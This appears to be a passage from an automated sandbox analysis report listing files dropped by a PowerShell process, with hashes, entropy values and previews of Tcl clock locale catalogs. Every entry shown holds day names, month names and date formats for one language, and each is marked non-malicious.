                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset lt DAYS_OF_WEEK_ABBREV [list \.. "Sk"\.. "Pr"\.. "An"\.. "Tr"\.. "Kt"\.. "Pn"\.. "\u0160t"].. ::msgcat::mcset lt DAYS_OF_WEEK_FULL [list \.. "Sekmadienis"\.. "Pirmadienis"\.. "Antradienis"\.. "Tre\u010diadienis"\.. "Ketvirtadienis"\.. "Penktadienis"\.. "\u0160e\u0161tadienis"].. ::msgcat::mcset lt MONTHS_ABBREV [list \.. "Sau"\.. "Vas"\.. "Kov"\.. "Bal"\.. "Geg"\.. "Bir"\.. "Lie"\.. "Rgp"\.. "Rgs"\.. "Spa"\.. "Lap"\.. "Grd"\.. ""].. ::msgcat::mcset lt MONTHS_FULL [list \.. "Sausio"\.. "Vasario"\.. "Kovo"\.. "Baland\u017eio"\.. "Gegu\u017e\u0117s"\.. "Bir\u017eelio"\.. "Liepos"\.. "Rugpj\u016b\u010dio"\.. "Rugs\u0117jo"\.. "Spa
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1271
                                                                                                                                                                                                                              Entropy (8bit):4.460631492946299
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83Amshb4mZdA7nl9kMmfpK269rkbi5vWm0W9ARivirXsv05vkn:430bHA7XRr95QWQQgaKkn
                                                                                                                                                                                                                              MD5:554ED2CAFD25F5F82DA54AE057F4BA98
                                                                                                                                                                                                                              SHA1:E25CDF0F9C4B523B5B05408E7820F7B4F627D19E
                                                                                                                                                                                                                              SHA-256:7E90D2008B220DB19C796C7107AD69D263B8AC8C7BDDFB879230699D978E9A0A
                                                                                                                                                                                                                              SHA-512:612201CCD64A51EC943921196D8C74D8BCA3AB3E35B0C9E91AE7F3A6B36F4F255AA9ADB3A254EC03629B01BD221B0B3F8CC4DFBFAC1F1718775E81CAD188AA86
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset lv DAYS_OF_WEEK_ABBREV [list \.. "Sv"\.. "P"\.. "O"\.. "T"\.. "C"\.. "Pk"\.. "S"].. ::msgcat::mcset lv DAYS_OF_WEEK_FULL [list \.. "sv\u0113tdiena"\.. "pirmdiena"\.. "otrdiena"\.. "tre\u0161diena"\.. "ceturdien"\.. "piektdiena"\.. "sestdiena"].. ::msgcat::mcset lv MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maijs"\.. "J\u016bn"\.. "J\u016bl"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset lv MONTHS_FULL [list \.. "janv\u0101ris"\.. "febru\u0101ris"\.. "marts"\.. "apr\u012blis"\.. "maijs"\.. "j\u016bnijs"\.. "j\u016blijs"\.. "augusts"\.. "septembris"\.. "oktobris"\.. "novembris"\..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2157
                                                                                                                                                                                                                              Entropy (8bit):4.299300188052441
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:4389QMsGqdQfRQPjQmofqJp9sk5BstSpWQiQ3QJQ5QL39I0QRQTQ8Ql4J8W:2W8SMq+9sWINi2Kc9I0+gXF
                                                                                                                                                                                                                              MD5:888014F13A82511ABEF99497A753BFC3
                                                                                                                                                                                                                              SHA1:7F4231BEDE191370B37E8B917B6AD8829D15CA7D
                                                                                                                                                                                                                              SHA-256:4C0EB07F0FCB36DD12A3F7EDD6531616611ABF62BF7705B5A37CC59098221D5D
                                                                                                                                                                                                                              SHA-512:D748127CC615584901D35B6492EC566448B6C4DA6363858B5145921E9CD09490355CF4315F0F7A8542AA12790CD3432011A643A3A8F74B0119DB0DCE19FD68A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0435\u0434."\.. "\u043f\u043e\u043d."\.. "\u0432\u0442."\.. "\u0441\u0440\u0435."\.. "\u0447\u0435\u0442."\.. "\u043f\u0435\u0442."\.. "\u0441\u0430\u0431."].. ::msgcat::mcset mk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0435\u043b\u0430"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0440\u0442\u043e\u043a"\.. "\u043f\u0435\u0442\u043e\u043a"\.. "\u0441\u0430\u0431\u043e\u0442\u0430"].. ::msgcat::mcset mk MONTHS_ABBREV [list \.. "\u0458\u0430\u043d."\.. "\u0444\u0435\u0432."\.. "\u043c\u0430\u0440."\.. "\u0430\u043f\u0440."\.. "\u043c\u0430\u0458."\.. "\u0458\u0443\u
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1846
                                                                                                                                                                                                                              Entropy (8bit):4.220147808639664
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR833cXh48Vc7VczfVczPmzNVcYVcR0prdSmS68FezUVcYVcR0prdSmS68FeoV:43K4S+0prjS68Yh0prjS68nV
                                                                                                                                                                                                                              MD5:07F99E0A05083B10F80A4D6867163B23
                                                                                                                                                                                                                              SHA1:B6036C7DA8043E3401583D03831E7A4BF755D93D
                                                                                                                                                                                                                              SHA-256:AE873BF5484EACBBE179913D43451BE53378FA701B5D81594D052266B8A09AF0
                                                                                                                                                                                                                              SHA-512:3A032C81B8FBFEE6EB66C1538CBD16329A1B393E4684B4E9B3FBCDD6344CE8AD34FA699F76EF953B3EB597D8E253345F54C2E92E7A43611C721038BCC2471EA2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mr DAYS_OF_WEEK_FULL [list \.. "\u0930\u0935\u093f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset mr MONTHS_ABBREV [list \.. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\.. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u090f\u092a\u094d\u0930\u093f\u0932"\.. "\u092e\u0947"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u0948"\.. "\u0913\u0917\u0938\u094d\u091f"\.. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\.. "\u0913\u0915\u094d\u091f\u0
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.89440333975705
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoGNv+IZoGU3v6ry/5oGNo+3v+6f6HyFvn:4EnLB383Zvlw3v6ry/ZF3vmSVn
                                                                                                                                                                                                                              MD5:67368E8A5715860BABD44E54A168192F
                                                                                                                                                                                                                              SHA1:7790D4B4B28FE5E38AB11CD037FFB826A8EB77FD
                                                                                                                                                                                                                              SHA-256:B7B1D379355A1D278E13EF557A887A662E84FB6A9B62B8E19A27927926270EF9
                                                                                                                                                                                                                              SHA-512:E95C90CFFA7CC4E61026FC328A4AA0BEE6A54A0061BA0B9459F9F0F4B008DD36F81BC9B8D8B964FA051FCEAB7FECE6D107CD456B3FD01A83B4900ECC3A0BCFA4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mr_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset mr_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset mr_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):957
                                                                                                                                                                                                                              Entropy (8bit):4.018924167342869
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383Zm/aufodZmt+JHEA7UVRosmAL/7Idzr43xRRosuL1PJHWZ6tHhHjv:4aR83ZsauSHJkA7umE/72UD21PJWZ0hT
                                                                                                                                                                                                                              MD5:7E6A943B7D82404F61BDBD95682073CD
                                                                                                                                                                                                                              SHA1:B96DBB1738F293D2842FDCEDF2DEF13004F77A8D
                                                                                                                                                                                                                              SHA-256:970B2F3ECC04980FCC2F9531CA6CE2BF36BC12942CB614BF70313B4CB0508985
                                                                                                                                                                                                                              SHA-512:12F5A5F7A170EE79D1F4398E96FF2DE84472027C5B5003DE7E86F46713E3F0997439E2EBA03FFB7DB611F0CE0E06EB149F5BD08ED2AA0409DB8348867487FFFD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ms DAYS_OF_WEEK_ABBREV [list \.. "Aha"\.. "Isn"\.. "Sei"\.. "Rab"\.. "Kha"\.. "Jum"\.. "Sab"].. ::msgcat::mcset ms DAYS_OF_WEEK_FULL [list \.. "Ahad"\.. "Isnin"\.. "Selasa"\.. "Rahu"\.. "Khamis"\.. "Jumaat"\.. "Sabtu"].. ::msgcat::mcset ms MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mac"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ogos"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dis"\.. ""].. ::msgcat::mcset ms MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Mac"\.. "April"\.. "Mei"\.. "Jun"\.. "Julai"\.. "Ogos"\.. "September"\.. "Oktober"\.. "November"\.. "Disember"\.. ""]..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):265
                                                                                                                                                                                                                              Entropy (8bit):4.818053174805798
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoChFfluoChF+3v6xyFjoCh++3vflm68vn:4EnLB383xPflwe3v6gZl3vflm6+n
                                                                                                                                                                                                                              MD5:A02F11BE0DF920E63E7A3ACCE746E32D
                                                                                                                                                                                                                              SHA1:4A8B1EF1A6F8A5FD022042D6E009A01E4B0FEBD3
                                                                                                                                                                                                                              SHA-256:F5B859D8DD2A2B5F756E39B0DFEB26B95878D2F54BA3CE46C56F0F26CF2B554B
                                                                                                                                                                                                                              SHA-512:5F9AF8C89F491CB4C158ED73EA4CF32E6A83CF44A94DA6FE1A962C58199BF2348530F3DEFA0C6F433BA3ADEF81AE9B3884F30CD7A841B159D52F9F21008B4F92
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ms_MY DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset ms_MY TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ms_MY DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):717
                                                                                                                                                                                                                              Entropy (8bit):4.55153350337982
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383VYmxWHWog4QUbxMmAMMiGZu+3v6ay/GK3vZsSVn:4aR83VYsxonQ2MmVVGRvjCGsvGSV
                                                                                                                                                                                                                              MD5:D8BBEC2F8935054E6081BB5E4AE8F7E3
                                                                                                                                                                                                                              SHA1:33FE6D51A284B8760BC6F442329B10374F506BDA
                                                                                                                                                                                                                              SHA-256:7DBC4E82D82FDE8CDF522FA10E082289D46B0C1A4A7D7A5FA83FF116677F052B
                                                                                                                                                                                                                              SHA-512:BF39C75DD6B3625897D7D44AC253AF5656CA21D0B394F78611584E2606CBC419C4A02353542D23393BEBCCF0CB4D861CDECD61AD89339F78C0260E966B495777
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mt DAYS_OF_WEEK_ABBREV [list \.. "\u0126ad"\.. "Tne"\.. "Tli"\.. "Erb"\.. "\u0126am"\.. "\u0120im"].. ::msgcat::mcset mt MONTHS_ABBREV [list \.. "Jan"\.. "Fra"\.. "Mar"\.. "Apr"\.. "Mej"\.. "\u0120un"\.. "Lul"\.. "Awi"\.. "Set"\.. "Ott"\.. "Nov"].. ::msgcat::mcset mt BCE "QK".. ::msgcat::mcset mt CE "".. ::msgcat::mcset mt DATE_FORMAT "%A, %e ta %B, %Y".. ::msgcat::mcset mt TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset mt DATE_TIME_FORMAT "%A, %e ta %B, %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1209
                                                                                                                                                                                                                              Entropy (8bit):4.313626715960843
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83B0tSYuZrIsmYmPAxyIQ4HU92W16EL3Tvav31:43qhuZrIPAt04yTcF
                                                                                                                                                                                                                              MD5:42D02C3CAF28BE4994F27CEF5A183AB7
                                                                                                                                                                                                                              SHA1:DC411E8AC12C3D588AB2F3A3C95A75D8689AD402
                                                                                                                                                                                                                              SHA-256:534C5DACEF12F818FAF4ED806997A559F95D591F1B6236B0C30B07A107DD13F3
                                                                                                                                                                                                                              SHA-512:0BE27572106324FE2B6CDFF4513500DE7582AD1ABEF451FFC62B2050D3875A149DDDB66451E1B3F5BA9216268E9998D2A1C1E8343BBB9EF97947DA054B82818E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nb DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset nb DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset nb MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nb MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nb BC
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1129
                                                                                                                                                                                                                              Entropy (8bit):4.235969198645435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR837Ed+RxRMZZsmUmnZAEEHM92WFU5vtrvs:43AAHRMZZPnZALsCtt7s
                                                                                                                                                                                                                              MD5:B9B949794203D204628D4DBEA29587AE
                                                                                                                                                                                                                              SHA1:1642D8040144469B5C359E80693E68036F87B849
                                                                                                                                                                                                                              SHA-256:9E2FE3851CF13EC79A9B10A09B01CEB0A26044AE0DC90A4E00BE57745E854C79
                                                                                                                                                                                                                              SHA-512:0CCCCF6D61423CEE0389C3BA1A8E94F2B092C53465D1937F5595AF91E46DD38B318D6C7EE3D88B89F32BFB952C0D55E0E67B46D7DF306ECA6690E283ADEB2CB9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl DAYS_OF_WEEK_ABBREV [list \.. "zo"\.. "ma"\.. "di"\.. "wo"\.. "do"\.. "vr"\.. "za"].. ::msgcat::mcset nl DAYS_OF_WEEK_FULL [list \.. "zondag"\.. "maandag"\.. "dinsdag"\.. "woensdag"\.. "donderdag"\.. "vrijdag"\.. "zaterdag"].. ::msgcat::mcset nl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mrt"\.. "apr"\.. "mei"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset nl MONTHS_FULL [list \.. "januari"\.. "februari"\.. "maart"\.. "april"\.. "mei"\.. "juni"\.. "juli"\.. "augustus"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset nl DATE_FORM
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.865165930946383
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xo4gPPdjog9X3vLjog9X3v6mjo49+3vnFDoAkvn:4EnLB3835gHdPF3vjF3v64I3v9dmn
                                                                                                                                                                                                                              MD5:3261F397ED0291368FF1881E7BA08ECE
                                                                                                                                                                                                                              SHA1:7147ABB62034EB152B1FED9246A533535F07372C
                                                                                                                                                                                                                              SHA-256:77A69DD60D171B321512B14794E75A66FF753410C007997B310790D86E09B057
                                                                                                                                                                                                                              SHA-512:C1526F454FA594DAD056B056F76F01D8B2AB713D04EB2A3643416B8E741B248CC94E000BAEE5B0F60436B88B1216FB1DE7F7C3FA456D4A4FBDE24F97C3B739B8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl_BE DATE_FORMAT "%d-%m-%y".. ::msgcat::mcset nl_BE TIME_FORMAT "%T".. ::msgcat::mcset nl_BE TIME_FORMAT_12 "%T".. ::msgcat::mcset nl_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1200
                                                                                                                                                                                                                              Entropy (8bit):4.282788574144479
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83tCtrJwuQrIsmYmLAxyIQ4HU92W1W4/3Hv+v31:434suQrILAt0EafIF
                                                                                                                                                                                                                              MD5:985E97517C2BF37719A618F575DF392C
                                                                                                                                                                                                                              SHA1:65BC07FC3A955300ED09B7485F90AEC18CBAD43F
                                                                                                                                                                                                                              SHA-256:06FA2D6D8C59D0B8EAC2EDE5AB0DDB8B6E095D1A023B1966FCE3B65916FA14FB
                                                                                                                                                                                                                              SHA-512:75BC14DBAD147A98D32D2AF0BE0BE50F115BB9C3BBE283B53977B9F264A055734B30F6B1C4EEE9686F1874D178C535111731C92D495B7D370FB17213B65C9A40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nn DAYS_OF_WEEK_ABBREV [list \.. "su"\.. "m\u00e5"\.. "ty"\.. "on"\.. "to"\.. "fr"\.. "lau"].. ::msgcat::mcset nn DAYS_OF_WEEK_FULL [list \.. "sundag"\.. "m\u00e5ndag"\.. "tysdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "laurdag"].. ::msgcat::mcset nn MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nn MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nn BCE "f.Kr."
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1263
                                                                                                                                                                                                                              Entropy (8bit):4.459506202908786
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83lUj0ORGgIzdW6RDYKG7FwRc0ypvOvX:43+HMg2W6RDYnFwRc0ydYX
                                                                                                                                                                                                                              MD5:79AB7C13AA3833A1DAEADDB1144CCE55
                                                                                                                                                                                                                              SHA1:C01ABC2F16549CAEC6B081448B2CBA88A680E250
                                                                                                                                                                                                                              SHA-256:61462C325DB0065352D8155307F949869862A86CAC67AD7BB6703F57A7FA2FF3
                                                                                                                                                                                                                              SHA-512:79EB696164FDDD9B121558C2780E54E295FF2DC4D8E87A0DE507B4F2925612721A98FF5010199CB68CF894ACA7A07884E9E02F3DC1E078D241431E3DC884C0A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pl DAYS_OF_WEEK_ABBREV [list \.. "N"\.. "Pn"\.. "Wt"\.. "\u015ar"\.. "Cz"\.. "Pt"\.. "So"].. ::msgcat::mcset pl DAYS_OF_WEEK_FULL [list \.. "niedziela"\.. "poniedzia\u0142ek"\.. "wtorek"\.. "\u015broda"\.. "czwartek"\.. "pi\u0105tek"\.. "sobota"].. ::msgcat::mcset pl MONTHS_ABBREV [list \.. "sty"\.. "lut"\.. "mar"\.. "kwi"\.. "maj"\.. "cze"\.. "lip"\.. "sie"\.. "wrz"\.. "pa\u017a"\.. "lis"\.. "gru"\.. ""].. ::msgcat::mcset pl MONTHS_FULL [list \.. "stycze\u0144"\.. "luty"\.. "marzec"\.. "kwiecie\u0144"\.. "maj"\.. "czerwiec"\.. "lipiec"\.. "sierpie\u0144"\.. "wrzesie\u0144"\.. "pa\u017adziernik"\.. "listopad"\..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1177
                                                                                                                                                                                                                              Entropy (8bit):4.394980756969744
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83CYkjBc1yHYJt//0/I31YMY47flV7YaqgCyt9Fo8g6Gtvt76svi:43C5LHcNnxJ9Ltg6Gpt76Ki
                                                                                                                                                                                                                              MD5:8F53B3571DD29E12BD33349CFA32F28F
                                                                                                                                                                                                                              SHA1:C125E059B8BFE5FECD482D1A1DA50B8678872BF6
                                                                                                                                                                                                                              SHA-256:6F6EEEDDCF232BDCB952592A144810CED44A1CBB4BCC2C062D5F98D441505380
                                                                                                                                                                                                                              SHA-512:5CD7E7097B720E5399795126A71348816CBA697FD8F14160779E982ADAB00D5994978E2F9445785B0DE62F6F14232278AD1A65BC53730CA58D676B057F0BC406
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Seg"\.. "Ter"\.. "Qua"\.. "Qui"\.. "Sex"\.. "S\u00e1b"].. ::msgcat::mcset pt DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Segunda-feira"\.. "Ter\u00e7a-feira"\.. "Quarta-feira"\.. "Quinta-feira"\.. "Sexta-feira"\.. "S\u00e1bado"].. ::msgcat::mcset pt MONTHS_ABBREV [list \.. "Jan"\.. "Fev"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset pt MONTHS_FULL [list \.. "Janeiro"\.. "Fevereiro"\.. "Mar\u00e7o"\.. "Abril"\.. "Maio"\.. "Junho"\.. "Julho"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Dezembro"
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.8608779725401785
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xofm6GPWWjofAW3vLjofAW3v6mjofm6T+3vnFDoAkvn:4EnLB383+NGdg93vk93v6fNK3v9dmn
                                                                                                                                                                                                                              MD5:A2626EA95C2480FEA68906AE6A1F6993
                                                                                                                                                                                                                              SHA1:A0592902337C00FC2E70B1DFB3A42453A86535BB
                                                                                                                                                                                                                              SHA-256:320BE7D5B730091E6FA35F196314737261C8E154577DCF6AC8C2057D44394AD7
                                                                                                                                                                                                                              SHA-512:9801A87D024565676D4F3EAF0702C213E59FC2B6719D8BE95C19C9ED53FC43487F65F5408378B401A2B4C2BD4E2E391C2D848CA87739A6082AB7766EC6B9EFE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt_BR DATE_FORMAT "%d-%m-%Y".. ::msgcat::mcset pt_BR TIME_FORMAT "%T".. ::msgcat::mcset pt_BR TIME_FORMAT_12 "%T".. ::msgcat::mcset pt_BR DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1224
                                                                                                                                                                                                                              Entropy (8bit):4.350784108088039
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83coPUMSeZmkTMm41icpK+7ZVoImEcVUCWdvHvWIn:43lPHFmkm1iMVoxEc+CWZPWIn
                                                                                                                                                                                                                              MD5:F6575EC17966320106FF7ABDFB3186E2
                                                                                                                                                                                                                              SHA1:68C6B72D664FDA27450FCE8B5734AB627CE825D7
                                                                                                                                                                                                                              SHA-256:25ED6AC7A353E23B954B98611AE3B7E56BDCF2B0CB0DB358253CFB8BEBBB831C
                                                                                                                                                                                                                              SHA-512:E564543231922A17C898419545BFA65E5E31FE9F005FDD201B735CFDE08E96FB3B98349C2A7959E29CA8F7E6934B0C4C6DE6B5E67209D0DD9A7746DFEBF037B3
                                                                                                                                                                                                                              Malicious:false
